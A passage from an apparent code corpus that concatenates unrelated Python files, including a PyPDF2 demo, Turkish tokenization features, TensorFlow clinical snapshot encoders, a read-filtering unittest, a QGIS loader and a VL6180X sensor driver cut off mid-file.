print("\n\n\nCalculating accuracy hit ratio...")
cahr = CalculateAccuracyHitRatio(barcodes, imageLocations) # accuracy calculator
print("Accuracy is {}".format(cahr.calculateAccuracy())) # calculate and display the accuracy
input("Yes I have read the above notes. Press Enter to DISPLAY ALL THE RESULTS at Once...")
print("\n\n\nSearching all the images in the dataset and finding results...")
print("Once you get the window maximize the window and scrolldown to see the results")
input("Yes I have read the above notes. Press Enter to continue...")
fig = si.showAllResults()
    a = ScrollableWindow(fig)
| 3.21875 | 3 |
file-operations/pdf_operations.py | kpunith8/python_samples | 0 | 12799101 | <filename>file-operations/pdf_operations.py
# Use PyPDF2 library to work with pdf files
# It can only read text content, not the images and other media content
import PyPDF2
# read as binary file, make sure you pass the pdf file name
pdf_file = open("path-to-pdf.pdf", "rb")
pdf_reader = PyPDF2.PdfFileReader(pdf_file)
print("Number of pages in the pdf file:", pdf_reader.numPages)
# 0 based index
grab_a_page = pdf_reader.getPage(10)
print("Content of a given page is:", grab_a_page.extractText())
# # It allows to append an page to end but hard to add content to any page
# pdf_writer = PyPDF2.PdfFileWriter()
# pdf_writer.addPage(grab_a_page)
# Write the page 101 to a new file, it creates a new file
# output_file = open("new_pdf_file.pdf", "wb")
# pdf_writer.write(output_file)
pdf_file.close()
# output_file.close()
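# Illustrative sketch (added; the function name and paths are hypothetical, and it
# assumes the same pre-3.0 PyPDF2 API used above): copy a page range into a new PDF.
def _copy_pages(src_path, dst_path, first_page, last_page):
    with open(src_path, "rb") as src, open(dst_path, "wb") as dst:
        reader = PyPDF2.PdfFileReader(src)
        writer = PyPDF2.PdfFileWriter()
        for i in range(first_page, min(last_page, reader.numPages)):
            writer.addPage(reader.getPage(i))
        writer.write(dst)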
| 3.875 | 4 |
src/feature_extraction_tokenization.py | garsontrier/turkish-nlp-preprocessor | 1 | 12799102 | # Written by <NAME>
import os
def file_feature_extraction(dir, filename):
'''
Navigates through tokenized words,
reconstructs original form by following few rules
Then, extracts features for that token and adds them to the corresponding list
All features of the dataset is written in the same txt file.
Args:
dir: directory of the given file
filename: name of the input file
Returns:
'''
punc = '\',.\"?!-;:()' # % left out for now
quote_count = 0
x = [] # features
y = [] # labels
tokens = []
with open(dir+filename, 'r', encoding='utf8') as f:
for line in f.readlines(): # each token is kept on a different line
tokens.append(line.rstrip('\n'))
for token, i in zip(tokens, range(len(tokens))):
found = False
if token in punc: # for only punctuation tokens
if (token == '\'' or token == '\"') and quote_count % 2 == 0:
quote_count += 1
punc_type = punc.index(token)
try:
original_form = token + tokens[i + 1] #add try statements
label = 1 # punctuation is another token
pos = 0
found = True
except IndexError:
break
# send for feature extraction
elif (token == '\'' or token == '\"') and quote_count % 2 == 1:
quote_count += 1
punc_type = punc.index(token)
original_form = tokens[i - 1] + token
label = 1 # punctuation is another token
pos = len(original_form) - 1
found = True
# send for feature extraction
elif token == '.' or token == ',' or token == '?' or token == '!' or token == ';' or token == ':':
punc_type = punc.index(token)
original_form = tokens[i - 1] + token
label = 1
pos = len(original_form) - 1
found = True
#send for feature extraction
elif token == '(':
punc_type = punc.index(token)
try:
original_form = token + tokens[i + 1]
label = 1
pos = 0
found = True
except IndexError:
break
elif token == ')':
punc_type = punc.index(token)
original_form = tokens[i - 1] + token
label = 1
pos = 0
found = True
else: # for not only punctuation tokens
if token == '...':
punc_type = punc.index(token[0])
original_form = tokens[i - 1] + token
label = 1
pos = len(original_form) - 1
found = True
else:
for ch, j in zip(token, range(len(token))): # iterate through string to detect punctuations
punc_type = punc.find(ch)
if punc_type != -1: # punctuation is found
pos = j
original_form = token
label = 0
found = True
break
if found:
only_punc = True
for j in original_form:
if j not in punc:
case = int(j.isupper())
only_punc = False
break
if not only_punc:
x.append([punc_type, pos, len(original_form), case])
y.append(label)
return x, y
def token_feature_extraction(token):
'''
Args:
token: token whose features are going to be extracted
Returns:
features for the token
used during inference
'''
x = None
punc = '\',.\"?!-;:()' # % left out for now
for ch, j in zip(token, range(len(token))): # iterate through string to detect punctuations
punc_type = punc.find(ch)
if punc_type != -1: # punctuation is found
pos = j
original_form = token
break
only_punc = True
for j in original_form:
if j not in punc:
case = int(j.isupper())
only_punc = False
break
if not only_punc:
x = [punc_type, pos, len(original_form), case]
return x
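# Illustrative example (added; the token is hypothetical): for the token "geldi,"
# the loop finds ',' (index 1 in punc) at position 5, the token length is 6 and the
# first non-punctuation character 'g' is lowercase, so x == [1, 5, 6, 0].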
if __name__ == '__main__':
x = []
y = []
dir = 'D:/Mansur/Boun/CMPE 561/assignments/assignment 1/42bin_haber/news/'
categories = os.listdir(dir)
for i in categories:
category_dir = dir + i + '/'
category_files = os.listdir(category_dir)
for j in category_files:
if '_tokenized' in j: # take only tokenized files
x_temp, y_temp = file_feature_extraction(category_dir, j)
x.extend(x_temp)
y.extend(y_temp)
with open('../features/tokenization_features_and_labels.txt', 'r+', encoding='utf8') as f:
for feature, i in zip(x, range(len(x))):
for j in feature:
f.write('%d\t' % j)
f.write('%d\n' % y[i])
| 3.734375 | 4 |
python/tools/simfempath.py | beckerrh/simfemsrc | 0 | 12799103 | <filename>python/tools/simfempath.py
import sys, os, shutil, subprocess
# def storeSourcePath(installdir, simfemsourcedir):
# with open(installdir+'/SOURCE_DIR_SIMFEM','w') as pathfile:
# pathfile.write(simfemsourcedir)
# def getSourcePath(installdir):
# with open(installdir+'/SOURCE_DIR_SIMFEM','r') as pathfile:
# return pathfile.read()
| 2.453125 | 2 |
src/hopts/grid_search.py | alexchueshev/icsme2020 | 0 | 12799104 | <gh_stars>0
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline
from .base_search import BaseSearchALS
_KWARG_TRANSFORM = 'transform_y'
class GridSearchALS(BaseSearchALS):
def fit(self, *args, **kwargs):
x_df, y_df, cols = args
transform_y = kwargs.get(_KWARG_TRANSFORM, None)
cv = self._make_cv(cols)
scorer = self._make_scorer(transform_y=transform_y)
gs = GridSearchCV(Pipeline(self.pipe),
self.hyperparameters,
cv=cv,
scoring=scorer,
return_train_score=self.with_train_score,
n_jobs=self.n_jobs,
verbose=self.verbose)
gs.fit(x_df, y=y_df)
return gs
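# Illustrative usage (added; constructor arguments depend on BaseSearchALS, which is
# not shown here, and the column list / transform are hypothetical):
#   searcher = GridSearchALS(...)  # pipeline steps, hyperparameter grid, CV settings
#   gs = searcher.fit(x_df, y_df, group_cols, transform_y=np.log1p)
#   print(gs.best_params_, gs.best_score_)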
| 2.640625 | 3 |
encoding.py | h4ste/cantrip | 2 | 12799105 | """ Clinical snapshot encoders for use with CANTRIP Model.
CANTRIPModel expects a clinical snapshot encoder function which takes as input the CANTRIPModel and adds
clinical snapshot encoding ops to the graph, returning the final clinical snapshot encoding as
[batch x max_seq_len x embedding_size]
"""
import tensorflow.compat.v1 as tf
import layers
import rnn_cell
def rnn_encoder(num_hidden, cell_fn=rnn_cell.RANCell):
"""
Creates an RNN encoder with the given number of hidden layers. If
:param num_hidden: number of hidden (memory) units use; num_hidden is iterable, a multi-layer
rnn cell will be creating using each number of hidden units
:param cell_fn: rnn_cell constructor to use
:return: rnn_encoder function
"""
def _rnn_encoder(model):
"""
:type model: modeling.BERTModel
"""
with tf.variable_scope('rnn_encoder'):
# Embed clinical observations
embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size,
model.embedding_size,
model.vocab_dropout,
training=model.training)
# Reshape to (batch * seq_len) x doc_len x embedding
flattened_embedded_obs = tf.reshape(embedded_observations,
[model.batch_size * model.max_seq_len,
model.max_snapshot_size,
model.embedding_size],
name='flat_emb_obs')
flattened_snapshot_sizes = tf.reshape(model.snapshot_sizes, [model.batch_size * model.max_seq_len],
name='flat_snapshot_sizes')
# Apply RNN to all documents in all batches
flattened_snapshot_encodings = layers.rnn_layer(cell_fn=cell_fn,
num_hidden=num_hidden,
inputs=flattened_embedded_obs,
lengths=flattened_snapshot_sizes,
return_interpretable_weights=False)
# Reshape back to (batch x seq_len x encoding_size)
return tf.reshape(flattened_snapshot_encodings,
[model.batch_size, model.max_seq_len, flattened_snapshot_encodings.shape[-1]],
name='rnn_snapshot_encoding')
return _rnn_encoder
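# Illustrative usage (added; the model construction itself lives elsewhere in the
# repo and is only assumed here): the returned closure is handed to the model,
# which calls it with itself to build the snapshot-encoding subgraph, e.g.
#   snapshot_encoder = rnn_encoder(num_hidden=[128])
#   encodings = snapshot_encoder(model)  # [batch_size x max_seq_len x encoding_size]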
def cnn_encoder(windows=None, kernels=1000, dropout=0.):
"""
Creates a CNN encoder with the given number of windows, kernels, and dropout
:param windows: number of consecutive observations to consider; defaults to [3, 4, 5]
:param kernels: number of convolutional kernels; defaults to 1,000
:param dropout: dropout probability; defaults to 0.0 (no dropout)
:return: cnn_encoder function
"""
if windows is None:
windows = [3, 4, 5]
def _cnn_encoder(model):
"""
:type model: BERTModel
"""
with tf.variable_scope('cnn_encoder'):
# Embed observations
embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size,
model.embedding_size,
model.vocab_dropout,
training=model.training)
# Reshape to (batch * seq_len) x snapshot_size x embedding
flattened_embedded_obs = tf.reshape(embedded_observations,
[model.batch_size * model.max_seq_len,
model.max_snapshot_size,
model.embedding_size])
# Apply parallel convolutional and pooling layers
outputs = []
for n in windows:
if dropout > 0:
flattened_embedded_obs = \
tf.keras.layers.Dropout(rate=model.dropout)(flattened_embedded_obs, training=model.training)
conv_layer = tf.keras.layers.Convolution1D(filters=kernels,
kernel_size=n,
activation=tf.nn.leaky_relu,
name="conv_%dgram" % n)(flattened_embedded_obs)
pool_layer = tf.keras.layers.MaxPooling1D(pool_size=1,
strides=model.max_snapshot_size - n + 1,
name="maxpool_%dgram" % n)(conv_layer)
outputs.append(pool_layer)
# Concatenate pooled outputs
output = tf.concat(outputs, axis=-1)
# Embed concat output with leaky ReLU
embeddings = tf.keras.layers.Dense(units=model.embedding_size, activation=tf.nn.relu)(output)
# Reshape back to [batch_size x max_seq_len x encoding_size]
return tf.reshape(embeddings, [model.batch_size, model.max_seq_len, model.embedding_size])
return _cnn_encoder
def get_bag_vectors(model):
"""
Represents snapshots as a bag of clinical observations. Specifically, returns a V-length
binary vector such that the v-th index is 1 iff the v-th observation occurs in the given snapshot
:param model: CANTRIP model
:type model: modeling.CANTRIPModel
:return: clinical snapshot encoding
"""
# 1. Evaluate which entries in model.observations are non-zero
mask = tf.not_equal(model.observations, 0)
where = tf.where(mask)
# 2. Get the vocabulary indices for non-zero observations
vocab_indices = tf.boolean_mask(model.observations, mask)
vocab_indices = tf.expand_dims(vocab_indices[:], axis=-1)
vocab_indices = tf.cast(vocab_indices, dtype=tf.int64)
# 3. Get batch and sequence indices for non-zero observations
tensor_indices = where[:, :-1]
# Concat batch, sequence, and vocabulary indices
indices = tf.concat([tensor_indices, vocab_indices], axis=-1)
    # Our sparse tensor will be 1 for observed observations, 0 otherwise
ones = tf.ones_like(indices[:, 0], dtype=tf.float32)
# The dense shape will be the same as model.observations, but using the entire vocabulary as the final dimension
dense_shape = model.observations.get_shape().as_list()
dense_shape[2] = model.vocabulary_size
# Store as a sparse tensor because they're neat
st = tf.SparseTensor(indices=indices, values=ones, dense_shape=dense_shape)
return tf.sparse.reorder(st)
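# Worked example for get_bag_vectors (illustrative values only): with vocabulary_size = 5 and a
# snapshot at (batch=0, seq=0) containing observation ids [2, 4], the dense view of the returned
# sparse tensor holds [0., 0., 1., 0., 1.] at that position, i.e. a V-length multi-hot indicator.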
def dense_encoder(model):
"""
    Represents documents as an embedded bag of clinical observations. Specifically, returns an embedding of the V-length
binary vector encoding all clinical observations included in a snapshot
:param model: CANTRIP model
:type model: modeling.CANTRIPModel
:return: clinical snapshot encoding
"""
with tf.variable_scope('dense_encoder'):
        # Use the CPU because things are about to get weird (i.e., too big to fit in GPU memory)
with tf.device("/cpu:0"):
# Add bag-of-observation vector transformations to the model
bags = get_bag_vectors(model)
# Embed bag-of-observation vectors
embedded_observations = layers.create_embeddings(model.vocabulary_size, model.embedding_size,
model.vocab_dropout,
training=model.training)
# Reshape them so we use the same projection weights for every bag
flat_emb_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len,
model.vocabulary_size],
name='flat_emb_obs')
# Dropout for fun
# if model.dropout > 0:
# flat_emb_bags = tf.layers.dropout(flat_emb_bags, rate=model.dropout, training=model.training)
# Sparse to dense projection
flat_doc_embeddings = tf.sparse_tensor_dense_matmul(flat_emb_bags, embedded_observations,
name='flat_doc_embeddings')
# More dropout for fun
flat_doc_embeddings = tf.keras.layers.Dropout(rate=model.dropout)(flat_doc_embeddings,
training=model.training)
# Reshape back to [batch_size x max_seq_len x encoding_size]
return tf.reshape(flat_doc_embeddings, [model.batch_size, model.max_seq_len, model.embedding_size],
name='doc_embeddings')
def bag_encoder(model):
"""
Represents snapshots as a bag of clinical observations. Specifically, returns a V-length
binary vector such that the v-th index is 1 iff the v-th observation occurs in the given snapshot
:param model: CANTRIP model
:type model: modeling.CANTRIPModel
:return: clinical snapshot encoding
"""
with tf.variable_scope('bow_encoder'):
        # Use the CPU because everything will be vocabulary-length
with tf.device("/cpu:0"):
return tf.sparse.to_dense(get_bag_vectors(model))
class SparseDenseLayer(tf.keras.layers.Dense):
def __init__(self,
units,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(SparseDenseLayer, self).__init__(units=units,
activation=activation,
use_bias=use_bias,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
activity_regularizer=activity_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
**kwargs)
def call(self, inputs):
if not isinstance(inputs, tf.SparseTensor):
return super(SparseDenseLayer, self).call(inputs)
outputs = tf.sparse.sparse_dense_matmul(inputs, self.kernel)
outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN product")
if self.use_bias:
outputs = tf.nn.bias_add(outputs, self.bias)
outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN bias sum")
if self.activation is not None:
outputs = self.activation(outputs)
outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer had NaN activation")
outputs = tf.debugging.check_numerics(outputs, "SparseDenseLayer output had NaNs")
return outputs
def dan_encoder(obs_hidden_units, avg_hidden_units, activation='gelu'):
"""Represents snapshots as a modified element-wise averages of embedded clinical observations.
:param obs_hidden_units: number of hidden units in dense layers between observation embeddings and average;
if iterable multiple dense layers will be added using the respective hidden units
:param avg_hidden_units: number of hidden units in dense layers between average embeddings and snapshot encoding;
if iterable multiple dense layers will be added using the respective hidden units
:param activation: type of activation function to use between layers
:return: clinical snapshot encoding
"""
activation_fn = None
if activation == 'gelu':
activation_fn = layers.gelu
elif activation == 'relu':
activation_fn = tf.nn.relu
elif activation == 'tanh':
activation_fn = tf.nn.tanh
elif activation == 'sigmoid':
activation_fn = tf.nn.sigmoid
else:
raise KeyError('Unsupported activation function: %s' % activation)
def _dan_encoder(model):
"""
:param model:
:type model: modeling.CANTRIPModel
:return:
"""
with tf.variable_scope('dan_encoder'):
embedded_observations = layers.embedding_layer(model.observations, model.vocabulary_size,
model.embedding_size, model.vocab_dropout,
training=model.training)
# Reshape to (batch * seq_len * doc_len) x embedding
flattened_embedded_observations = tf.reshape(
embedded_observations,
[model.batch_size * model.max_seq_len * model.max_snapshot_size,
model.embedding_size]
)
# Add dense observation layers
obs_layer = flattened_embedded_observations
for num_hidden in obs_hidden_units:
obs_layer = tf.keras.layers.Dense(units=num_hidden, activation=activation_fn)(obs_layer)
# Reshape final output by grouping observations in the same snapshot together
obs_layer = tf.reshape(obs_layer, [model.batch_size * model.max_seq_len,
model.max_snapshot_size,
obs_hidden_units[-1]])
# Divide by active number of observations rather than the padded snapshot size; requires reshaping to
# (batch x seq_len) x 1 so we can divide by this
flattened_snapshot_sizes = tf.reshape(model.snapshot_sizes, [model.batch_size * model.max_seq_len, 1])
mask = tf.sequence_mask(model.snapshot_sizes, maxlen=model.max_snapshot_size, dtype=tf.float32)
mask = tf.reshape(mask, [model.batch_size * model.max_seq_len, model.max_snapshot_size, 1])
# Compute dynamic-size element-wise average
avg_layer = tf.reduce_sum(obs_layer * mask, axis=1)
avg_layer = avg_layer / tf.cast(tf.maximum(flattened_snapshot_sizes, 1), dtype=tf.float32)
# More fun dense layers
for num_hidden in avg_hidden_units:
avg_layer = tf.keras.layers.Dense(num_hidden, activation_fn)(avg_layer)
# Final output of the model
output = tf.keras.layers.Dense(model.embedding_size, activation_fn)(avg_layer)
# Reshape to [batch_size x seq_len x encoding_size]
return tf.reshape(output, [model.batch_size, model.max_seq_len, model.embedding_size])
return _dan_encoder
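# Worked example for the masked average in _dan_encoder (illustrative values only): if a snapshot
# holds 2 real observations padded out to max_snapshot_size = 4, the mask zeroes the 2 padded rows
# and the sum is divided by 2 (not 4), so padding does not dilute the snapshot encoding.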
def rmlp_encoder(activation='gelu', num_layers=10, num_hidden=2048):
activation_fn = None
if activation == 'gelu':
activation_fn = layers.gelu
elif activation == 'relu':
activation_fn = tf.nn.relu
elif activation == 'tanh':
activation_fn = tf.nn.tanh
elif activation == 'sigmoid':
activation_fn = tf.nn.sigmoid
else:
raise KeyError('Unsupported activation function: %s' % activation)
def residual_unit(inputs, i, units):
with tf.variable_scope("residual_unit%d" % i):
x = tf.keras.layers.Dense(units=units, activation=activation_fn)(inputs)
x = tf.keras.layers.BatchNormalization()(x)
x = activation_fn(x)
return x + inputs
def _rmlp_encoder(model):
# Convert batch x seq_len x doc_len tensor of obs IDs to batch x seq_len x vocab_size bag-of-observation vectors
with tf.variable_scope("RMLP"):
bags = get_bag_vectors(model)
flat_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len, model.vocabulary_size])
x = SparseDenseLayer(units=num_hidden, activation=None)(flat_bags)
# Convert to Dense to debug NaNs
# flat_bags = tf.sparse.to_dense(flat_bags)
# flat_bags = tf.debugging.assert_all_finite(flat_bags, 'flat bags had nans')
# x = tf.keras.layers.Dense(units=num_hidden, activation=None)(flat_bags)
for i in range(num_layers):
x = residual_unit(x, i, num_hidden)
x = tf.keras.layers.Dense(units=model.embedding_size, activation=activation_fn)(x)
x = tf.debugging.assert_all_finite(x, 'dense had nans')
x = tf.reshape(x, [model.batch_size, model.max_seq_len, model.embedding_size])
x = tf.debugging.assert_all_finite(x, 'reshape had nans')
return x
return _rmlp_encoder
def vhn_encoder(activation='gelu', noise_weight=0.75, num_layers=10, depth=6, num_hidden=2048):
activation_fn = None
if activation == 'gelu':
activation_fn = layers.gelu
elif activation == 'relu':
activation_fn = tf.nn.relu
elif activation == 'tanh':
activation_fn = tf.nn.tanh
elif activation == 'sigmoid':
activation_fn = tf.nn.sigmoid
else:
raise KeyError('Unsupported activation function: %s' % activation)
def vhn_layer(inputs, units, residuals):
noise = tf.random.uniform(shape=inputs.shape, dtype=tf.float32) / noise_weight
out = tf.keras.layers.Dense(units=units, activation=activation_fn)(inputs + noise)
return tf.math.add_n([out, inputs] + residuals)
def _vhn_encoder(model):
# Convert batch x seq_len x doc_len tensor of obs IDs to batch x seq_len x vocab_size bag-of-observation vectors
bags = get_bag_vectors(model)
flat_bags = tf.sparse.reshape(bags, [model.batch_size * model.max_seq_len, model.vocabulary_size])
x = SparseDenseLayer(units=num_hidden, activation=None)(flat_bags)
residuals = []
for i in range(num_layers):
slice_ = min(i + 1, depth)
x = vhn_layer(x, units=num_hidden, residuals=residuals[-slice_:])
residuals.append(x)
x = tf.keras.layers.Dense(units=model.embedding_size, activation=activation_fn)(x)
x = tf.reshape(x, [model.batch_size, model.max_seq_len, model.embedding_size])
return x
return _vhn_encoder
| 2.671875 | 3 |
test_filter_commands.py | antgonza/version-testing-fastp-minimap2 | 0 | 12799106 | import gzip
import unittest
import subprocess
import os
class TestPreProcessing(unittest.TestCase):
def setUp(self):
# params for the test
self.curr_path = os.path.dirname(os.path.abspath(__file__))
self.output_path = self.curr_path + "/data"
self.file_one = self.output_path + "/all_reads_R1.fq"
self.file_two = self.output_path + "/all_reads_R2.fq"
self.database_path = self.curr_path
self.db_one_name = "human-GCA-phix-db"
self.db_two_name = "human-GRC-db"
self.db_three_name = "kraken2-human-db"
pass
def test_command(self):
"""Test command completes."""
# run command
res_cmnd = subprocess.run(["./test-command.sh",
self.file_one,
self.file_two,
self.database_path,
self.db_one_name,
self.db_two_name,
self.db_three_name,
self.output_path])
self.assertTrue(res_cmnd.returncode == 0)
def test_filter_results(self):
"""Test command results match expectation."""
# base truth
with open(self.output_path + '/host_read_ids.txt') as file:
exp_lines = [line.replace('\n','') for line in file.readlines()]
# check file size (should be much greater than 100 bytes)
out_size = os.path.getsize(self.output_path + '/test_res_R1.trimmed.fastq.gz')
self.assertTrue(out_size > 100)
# results
with gzip.open(self.output_path + '/test_res_R1.trimmed.fastq.gz','r') as fin:
res_lines = [line.decode("utf-8").replace('\n','') for line in fin if '@' in str(line)]
# check there are no host reads passing filter
rel_tol = len(set(res_lines) & set(exp_lines)) / len(set(exp_lines)) * 100
self.assertTrue(rel_tol < 0.1)
# finally remove files
os.remove(self.curr_path + "/fastp.html")
os.remove(self.curr_path + "/fastp.json")
os.remove(self.output_path + "/test_res_R1.trimmed.fastq.gz")
os.remove(self.output_path + "/test_res_R2.trimmed.fastq.gz")
if __name__ == "__main__":
unittest.main()
| 2.734375 | 3 |
tonggong/validations/__init__.py | Scar1et-x/tonggong | 0 | 12799107 | <filename>tonggong/validations/__init__.py
from . import errors, utils, validators
__all__ = ["validators", "errors", "utils"]
| 1.25 | 1 |
openeo-qgis-plugin-master/models/result.py | bgoesswe/openeo-qgis-plugin | 0 | 12799108 | <filename>openeo-qgis-plugin-master/models/result.py<gh_stars>0
from qgis.core import QgsRasterLayer
from qgis.PyQt.QtCore import QFileInfo
from qgis.core import QgsProject
class Result():
def __init__(self, path=None):
self.path = path
def display(self):
"""
Displays an image from the given path on a new created QGIS Layer.
"""
# Check if string is provided
if self.path:
fileInfo = QFileInfo(self.path)
path = fileInfo.filePath()
baseName = fileInfo.baseName()
layer = QgsRasterLayer(path, baseName)
QgsProject.instance().addMapLayer(layer)
            if layer.isValid():
                print("Layer was loaded successfully!")
            else:
                print("Unable to read basename and file path - Your string is probably invalid")
| 2.296875 | 2 |
python/raspberrypi/DFRobot_VL6180X.py | DFRobot/DFRobot_VL6180X | 0 | 12799109 | <filename>python/raspberrypi/DFRobot_VL6180X.py
# -*- coding: utf-8 -*
""" file DFRobot_VL6180X.py
# DFRobot_VL6180X Class infrastructure, implementation of underlying methods
@copyright Copyright (c) 2010 DFRobot Co.Ltd (http://www.dfrobot.com)
@licence The MIT License (MIT)
@author [yangfeng]<<EMAIL>>
@version V1.0
@date 2021-02-09
@get from https://www.dfrobot.com
@url https://github.com/DFRobot/DFRobot_VL6180X
"""
import smbus
import time
import RPi.GPIO as GPIO
class DFRobot_VL6180X:
# IIC ADDR
VL6180X_IIC_ADDRESS = 0x29
# The sensor register address
VL6180X_IDENTIFICATION_MODEL_ID = 0x000
VL6180X_SYSTEM_MODE_GPIO0 = 0X010
VL6180X_SYSTEM_MODE_GPIO1 = 0X011
VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO = 0x014
VL6180X_SYSTEM_INTERRUPT_CLEAR = 0x015
VL6180X_SYSTEM_FRESH_OUT_OF_RESET = 0x016
VL6180X_SYSTEM_GROUPED_PARAMETER_HOLD = 0x017
VL6180X_SYSRANGE_START = 0x018
VL6180X_SYSRANGE_THRESH_HIGH = 0x019
VL6180X_SYSRANGE_THRESH_LOW = 0x01A
VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD = 0x01B
VL6180X_SYSRANGE_MAX_CONVERGENCE_TIME = 0x01C
VL6180X_SYSRANGE_EARLY_CONVERGENCE_ESTIMATE = 0x022
VL6180X_SYSRANGE_MAX_AMBIENT_LEVEL_MULT = 0x02C
VL6180X_SYSRANGE_RANGE_CHECK_ENABLES = 0x02D
VL6180X_SYSRANGE_VHV_RECALIBRATE = 0x02E
VL6180X_SYSRANGE_VHV_REPEAT_RATE = 0x031
VL6180X_SYSALS_START = 0x038
VL6180X_SYSALS_THRESH_HIGH = 0x03A
VL6180X_SYSALS_THRESH_LOW = 0x03C
VL6180X_SYSALS_INTERMEASUREMENT_PERIOD = 0x03E
VL6180X_SYSALS_ANALOGUE_GAIN = 0x03F
VL6180X_SYSALS_INTEGRATION_PERIOD = 0x040
VL6180X_RESULT_RANGE_STATUS = 0x04D
VL6180X_RESULT_ALS_STATUS = 0x04E
VL6180X_RESULT_INTERRUPT_STATUS_GPIO = 0x04F
VL6180X_RESULT_ALS_VAL = 0x050
VL6180X_RESULT_RANGE_VAL = 0x062
VL6180X_READOUT_AVERAGING_SAMPLE_PERIOD = 0x10A
VL6180X_FIRMWARE_RESULT_SCALER = 0x120
VL6180X_I2C_SLAVE_DEVICE_ADDRESS = 0x212
VL6180X_INTERLEAVED_MODE_ENABLE = 0x2A3
# The valid ID of the sensor
VL6180X_ID = 0xB4
# 8 gain modes for ambient light
VL6180X_ALS_GAIN_20 = 0
VL6180X_ALS_GAIN_10 = 1
VL6180X_ALS_GAIN_5 = 2
VL6180X_ALS_GAIN_2_5 = 3
VL6180X_ALS_GAIN_1_67 = 4
VL6180X_ALS_GAIN_1_25 = 5
VL6180X_ALS_GAIN_1 = 6
VL6180X_ALS_GAIN_40 = 7
  # The result of the range measurements
VL6180X_NO_ERR = 0x00
VL6180X_ALS_OVERFLOW_ERR = 0x01
VL6180X_ALS_UNDERFLOW_ERR = 0x02
VL6180X_NO_ERR = 0x00
VL6180X_EARLY_CONV_ERR = 0x06
VL6180X_MAX_CONV_ERR = 0x07
VL6180X_IGNORE_ERR = 0x08
VL6180X_MAX_S_N_ERR = 0x0B
VL6180X_RAW_Range_UNDERFLOW_ERR = 0x0C
VL6180X_RAW_Range_OVERFLOW_ERR = 0x0D
VL6180X_Range_UNDERFLOW_ERR = 0x0E
VL6180X_Range_OVERFLOW_ERR = 0x0F
# GPIO1 mode selection
VL6180X_DIS_INTERRUPT = 0
VL6180X_HIGH_INTERRUPT = 1
VL6180X_LOW_INTERRUPT = 2
# als/range interrupt mode selection
VL6180X_INT_DISABLE = 0
VL6180X_LEVEL_LOW = 1
VL6180X_LEVEL_HIGH = 2
VL6180X_OUT_OF_WINDOW = 3
VL6180X_NEW_SAMPLE_READY = 4
'''
@brief Module init
@param bus Set to IICBus
@param addr Set to IIC addr
'''
def __init__(self,iic_addr =VL6180X_IIC_ADDRESS,bus = 1):
self.__i2cbus = smbus.SMBus(bus)
self.__i2c_addr = iic_addr
self.__gain = 1.0
self.__atime =100
'''
@brief Initialize sensor
    @return True on success; False on failure.
'''
def begin(self):
device_id = self.__get_device_id()
if device_id != self.VL6180X_ID:
return False
self.__init()
return True
'''
@brief Configure the default level of the INT pin and enable the GPIO1 interrupt function
@param mode Enable interrupt mode
@n VL6180X_DIS_INTERRUPT disabled interrupt
    @n     VL6180X_HIGH_INTERRUPT        GPIO1 interrupt enabled, INT high by default
@n VL6180X_LOW_INTERRUPT GPIO1 interrupt enabled, INT low by default
'''
def set_interrupt(self,mode):
if(mode == self.VL6180X_DIS_INTERRUPT):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x20])
elif(mode == self.VL6180X_HIGH_INTERRUPT):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x10])
elif(mode == self.VL6180X_LOW_INTERRUPT):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_MODE_GPIO1>>8, [self.VL6180X_SYSTEM_MODE_GPIO1,0x30])
'''
    @brief Perform a single range measurement
    @return ranging data, unit: mm
'''
def range_poll_measurement(self):
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_START>>8, [self.VL6180X_SYSRANGE_START,0x01])
return self.range_get_measurement()
'''
    @brief Configure the ranging measurement period
@param period_ms Measurement period, in milliseconds
'''
def range_set_inter_measurement_period(self,period_ms):
if(period_ms > 10):
if(period_ms < 2550):
period_ms = ( period_ms / 10 ) -1
else:
period_ms = 254
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD>>8, [self.VL6180X_SYSRANGE_INTERMEASUREMENT_PERIOD,period_ms])
'''
@brief Configure the interrupt mode for ranging
@param mode Enable interrupt mode
@n VL6180X_INT_DISABLE interrupt disable
@n VL6180X_LEVEL_LOW value < thresh_low
@n VL6180X_LEVEL_HIGH value > thresh_high
@n VL6180X_OUT_OF_WINDOW value < thresh_low OR value > thresh_high
@n VL6180X_NEW_SAMPLE_READY new sample ready
'''
def range_config_interrupt(self,mode):
if(mode > self.VL6180X_NEW_SAMPLE_READY):
return False
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO])
value = self.__i2cbus.read_byte(self.__i2c_addr)
value = value | mode
self.__i2cbus.write_i2c_block_data(self.__i2c_addr,self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO>>8, [self.VL6180X_SYSTEM_INTERRUPT_CONFIG_GPIO,value])
'''
@brief Configure the interrupt mode for the ambient light
@param mode Enable interrupt mode
@n VL6180X_INT_DISABLE interrupt disable
@n VL6180X_LEVEL_LOW value < thresh_low
